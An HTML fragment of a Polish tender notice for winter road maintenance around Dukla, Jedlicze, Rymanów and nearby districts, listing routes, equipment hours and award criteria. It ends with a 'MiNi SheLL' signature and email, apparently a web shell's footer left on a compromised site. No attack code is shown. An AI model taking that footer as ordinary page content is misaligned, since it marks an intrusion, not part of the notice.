droga Nr 2002R odcinek Iwonicz - do dr. K9 do dr. Nr 1976R 
droga Nr 2002R odcinek Iwonicz - Iwonicz Zdrój  do dr. Nr 1976R
droga Nr 1976R odcinek Iwonicz - Rogi do dr. K9
Zjazd  dr. K9 do ODM Dukla
  									Długość trasy - 34,0km

Trasa 2: Dojazd  dr. K9 - Równe
Praca droga Nr 2000R Równe - Lubatówka
droga Nr 2001R Lubatówka - Rogi  Lubatówka - Lubatowa
droga Nr 2001R - droga Nr 2000R o dr. K9
Zjazd  dr. K9 do ODM Dukla
Długość trasy - 39,0km

Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 5) -  260godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. CZAS PODSTAWIENIA, w przypadku awarii, zastępczych pojazdów i sprzętu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część 6: Rejon Dukla.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasa 1: Praca droga Nr 1999R Dukla - Jasionka Dukla
 droga Nr 1994R Dukla - Teodorówka Dukla
Dojazd  dr. woj. Dukla - Głojsce
droga Nr 1993R Głojsce - Draganowa - Sulistrowa  Głojsce do dr. woj.
Zjazd  dr. woj. Głojsce - Dukla ODM
Długość trasy - 48,0km

Trasa 2: Dojazd  dr. woj. Dukla - Iwla
Praca droga Nr 1911R Iwla - Ropianka
droga Nr 1995R Ropianka - Olchowiec Ropianka 
droga Nr 1911R Ropianka - Chyrowa do dr. Nr 1996R 
droga Nr 1996R Chyrowa - Mszana - Tylawa Chyrowa do dr. Nr 1911R
droga Nr 1911R Chyrowa - Iwla do dr. woj.
Zjazd  dr. woj. - Dukla ODM
Długość trasy - 48,0km

Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 6) -  473godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. CZAS PODSTAWIENIA, w przypadku awarii, zastępczych pojazdów i sprzętu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część 7: Rejon Jedlicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasa 1: Praca droga Nr 1847R Jedlicze - Potok do dr. K9 do dr. Nr 1946R 
droga Nr 1946R Jedlicze - Potok do dr. K9 do dr. Nr 1847R
droga Nr 1847R do dr. Nr 1945R 
droga Nr 1945R Jedlicze - Jaszczew do dr. K9 do dr. Nr 1847R
droga Nr 1847R Jedlicze - Chlebna do gr. powiat. Jasło do dr. Nr 1951R
droga Nr 1951R Chlebna - do dr. Nr 1950R
droga Nr 1950R Chlebna - Kopytowa  Chlebna
droga Nr 1951R Chlebna - Piotrówka
droga Nr 1892R Piotrówka - Wrocanka do gr. powiat. Jasło do dr. Nr 1951R
droga Nr 1951R Piotrówka - do gr. powiat. Jasło do dr. nr 1847R
droga Nr 1847 R Chlebna - Jedlicze - do bazy materiałowej
Długość trasy - 46,0km

Trasa 2: Praca droga Nr 1947R Jedlicze - Dobieszyn do dr. Nr 1958R 
droga Nr 1958R Dobieszyn - Świerzowa Pol. do cmentarza do dr. Nr 1947R
droga Nr 1947R Dobieszyn - Krosno Dobieszyn do dr. Nr 1948R
droga Nr 1948R Dobieszyn - Turaszówka Dobieszyn do dr. Nr 1947R
droga Nr 1947R Dobieszyn - Jedlicze do dr. Nr 1949R droga Nr 1949R Jedlicze - Żarnowiec - Zręcin do dr. Nr 2413R
droga Nr 2413R Żarnowiec - Długie - Jedlicze Żarnowiec do dr. Nr 1949R
droga Nr 1949R Żarnowiec - Jedlicze do bazy materiałowej
 Długość trasy - 39,0km

Trasa 3: Dojazd  dr. K 28 - Moderówka
Praca droga Nr 1846R Chrząstówka do dr. Nr 98  do dr. K28
Zjazd  dr. K28 do bazy materiałowej
Długość trasy - 13,0km

Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 7) -  208godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. CZAS PODSTAWIENIA, w przypadku awarii, zastępczych pojazdów i sprzętu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Część 8: Rejon Wojaszówka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasa 1: Praca droga Nr 1924R Kobyle - Bratkówka - Odrzykoń od dr. Nr. 1941R w m.
                               Łączki Jagiellońskie  do dr. Nr 1944R Jaszczew - Ustrobna - Bratkówka droga Jaszczew - Ustrobna - Bratkówka do dr. woj. Nr 990  powrót do
 drogi Nr 1924R 
 droga Nr 1924R Kobyle - Bratkówka - Odrzykoń do dr. 1960R Krosno -
Odrzykoń
droga Nr 1960R Krosno - Odrzykoń do dr. Woj. Nr 990
 droga Nr 1960R Krosno - Odrzykoń do końca
droga Nr 1960R Krosno - Odrzykoń do dr. Nr 1924R Kobyle - Bratkówka -
 Odrzykoń 
 droga Nr 1924R Kobyle - Bratkówka - Odrzykoń do dr. Nr 1940R
 droga 1940R odcinek Bratkówka - Rzepnik ( do końca naw. bitumicznej ) 
 powrót do dr. 1924R
 droga 1924R odcinek Bratkówka - Łączki Jagiellońskie do dr. 1941R
     ( koniec trasy)
 								Długość trasy - 27,00km

Trasa 2: Praca  droga Nr 1924R  odcinek: Łęki Strzyżowskie od granicy  z powiatem Strzyż
 do dr. 1940R                
droga Nr 1940R odcinek Łęki Strzyżowskie - Przybówka do dr. woj. 990  do
 dr. Nr 1924 
droga Nr 1924R  odcinek Łęki Strzyżowskie - Łączki  Jagiellońskie - do dr. 
Nr 1941R 
droga Nr 1941R Łączki Jagiellońskie - Wojaszówka do dr. woj. 990 do dr.
 Nr 1924R
droga Nr 1924R odcinek Łączki Jagiellońskie - Łęki Strzyżowskie do dr. Nr
 1940R
 droga Nr 1940R  odcinek  Łęki Strzyżowskie - Rzepnik ( do końca naw.
 bitumicznej ) do dr. 1924R
  DROGA 1924R do granicy z powiatem strzyżowskim (koniec trasy)

Długość trasy - 35,00km

Trasa 3: 
Droga Nr 1961R Odrzykoń - Sporne						2,414km
Droga Nr 1962R Krosno - Głębokie - Czarnorzeki - Jasienica Rosielna		3,460km
			
										Długość trasy - 5,874km

Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 8) -  372godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. CZAS PODSTAWIENIA, w przypadku awarii, zastępczych pojazdów i sprzętu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Część 9: Rejon Jaśliska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmuje drogi: 
1. Nr 2116R Jaśliska - Czeremcha - Granica Państwa na odcinku Posada Jaśliska - Jaśliska - Lipowiec, 
2. Nr 2117R Wola Niżna - Wola Wyżna 
									                         Długość trasy - 14,5km

Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 9) -  247godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. CZAS PODSTAWIENIA, w przypadku awarii, zastępczych pojazdów i sprzętu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Część 10: Rejon Rymanów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasa 1:
1.	Nr 2113R Pastwiska - Puławy, 
2.	Nr 2114R Rudawka Rymanowska - Wisłoczek, 
3.	Nr 2115R Puławy przez wieś.
							Długość trasy - 14,0km

Trasa 2:
Nr 2009R Klimkówka p. wieś
Długość trasy - 8,1 km

Trasa 3: Praca droga Nr 2111R Głębokie - Sieniawa -Rymanów,
droga Nr 2010R Rymanów -Milcza
droga Nr 2007R Milcza - do granicy z powiatem Sanok  do dr. Nr 2010R
droga Nr 2007R Milcza do dr. woj.
Dojazd  dr. woj. - Bzianka
droga Nr 2006R Bzianka - do granicy z powiatem Brzozów  do dr. woj.
droga Nr 2006R Bzianka - Poręby do granicy z powiatem Sanok  do dr. woj.
Dojazd  dr. woj. - Milcza do dr. Nr 2007R
Praca droga Nr 2007R Milcza do dr. Nr 2010R
droga Nr 2010R Milcza - Rymanów 
droga Nr 2111R Rymanów - Sieniawa - Głębokie
Długość trasy - 43,00km

Trasa 4: Dojazd dr. K 28 do dr. woj. - Wróblik Szlachecki do dr. Nr 1974R
Praca droga Nr 1974R Wróblik Szlachecki - Wróblik Królewski do dr. Nr 2008R 
droga Nr 2008R Wróblik Królewski - Ladzin  do dr. Nr 1974R
droga Nr 1974R Wróblik Królewski - Wróblik Szlachecki do dr. woj.
Dojazd  dr. woj. - Wróblik Szlachecki do dr. Nr 2005R 
Praca droga Nr 2005R Wróblik Szlachecki - Haczów  do dr. woj.
Zjazd do bazy
 Długość trasy -11,00km
Trasa 5: 
Nr 2112R Królik Polski - Bałucianka
Długość trasy - 2,5km

Szacunkowa ilość godzin pracy sprzetu w sezonie zimowym 2015/2016 (dotyczy części 10) -  179godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. CZAS PODSTAWIENIA, w przypadku awarii, zastępczych pojazdów i sprzętu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Część 11: Rejon Puławy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasa 1:
1.	Nr 2113R Pastwiska - Puławy, 
2.	Nr 2114R Rudawka Rymanowska - Wisłoczek, 
3.	Nr 2115R Puławy przez wieś.
							Długość trasy - 14,0km


Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 11) -  202godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. CZAS PODSTAWIENIA, w przypadku awarii, zastępczych pojazdów i sprzętu - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com